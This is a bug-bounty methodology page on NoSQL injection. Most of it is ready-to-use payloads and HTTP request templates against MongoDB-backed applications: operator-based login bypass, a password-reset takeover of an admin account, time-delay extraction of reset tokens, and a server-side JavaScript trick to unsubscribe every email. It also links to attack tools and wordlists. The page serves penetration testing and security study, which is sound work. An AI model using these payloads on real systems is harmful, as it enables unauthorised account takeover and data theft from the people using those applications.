NoSQL injection

NoSQL injection: methodology and payloads

LogoBug-Bounty-Methodology/NoSQL Injection.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

Detection

http://target.com/search?id=12345

Change to:

http://target.com/search?id[$ne]=12345
http://target.com/search?id[$gt]=0

Inject each of the following special characters and observe for response changes

$
{
}
\
"
`
;
%00

Login Bypass

POST /customer_zone/sign_in HTTP/2.0
Host: example.com
Content-Type: application/json
User-Agent: ...

{
    "customer_email": "customer@example.com",
    "password": { "$gt": "" }
}

Reset Password - Use parameter arrays

Target only accepts parameters in form-data...

Make use of parameter arrays to send query operators

Some parameter parsing packages support parameter arrays and auto-convert them to the correct format

POST /auth/reset-password HTTP/2
Host: app.example.com
Content-Type: application/json; charset=utf-8
User-Agent: ...

{
    "email": "admin@example.com",
    "token": {"$ne": null},
    "newPassword": "hunter2"
}
POST /auth/reset-password HTTP/2
Host: app.example.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: ...

email=admin@example.com&token[$ne]=null&newPassword=hunter2

API

A basic bypass for a Content-Type of application/x-www-form-urlencoded might look like this:

user[$ne]=fu&pass[$ne]=bar

If the login endpoint is accepting JSON, it might look something like this:

{"user": {"$ne": "fu"}, "pass": {"$ne": "bar" }}
LogoHow to bypass API auth using NoSQL InjectionDana Epp's Blog

Mongo DB Payloads

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
|| 1==1//
|| 1==1%00
}, { password : /.*/ }
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
LogoNoSQL injectionHackTricks
LogoNoSQL injection | Web Security AcademyWebSecAcademy
LogoNoSQL Injection & Exploitation TechniquesMedium

Time delays

Extract data with time delays 

POST /auth/reset-password HTTP/2
Host: app.example.com
Content-Type: application/json; charset=utf-8
User-Agent: ...

{
  "email": "admin@example.com",
  "token": {
      "$where": "if(this.token.startsWith('a')) {sleep(5000); return true;} else {return true;}"
  },
  "password": "hunter2"
}

Server-Side Javascript code

Unsubscribe all the emails

POST /newsletter/unsubscribe HTTP/2
Host: app.example.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: ...

email=user@example.com'+||+TRUE;//&token=

Wordlist

LogoGitHub - cr0hn/nosqlinjection_wordlists: This repository contains payload to test NoSQL InjectionsGitHub

Tools

LogoGitHub - codingo/NoSQLMap: Automated NoSQL database enumeration and web application exploitation tool.GitHub
LogoHacker Tools: NoSQLMap – No SQL, Yes exploitationIntigriti
LogoGitHub - C4l1b4n/NoSQL-Attack-Suite: This suite consists of two different scripts, made to automate attacks against NoSQL databases.GitHub

Resources

LogoNoSQL Injection: Advanced Exploitation GuideIntigriti

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousSQL InjectionNextLDAP Injection

Last updated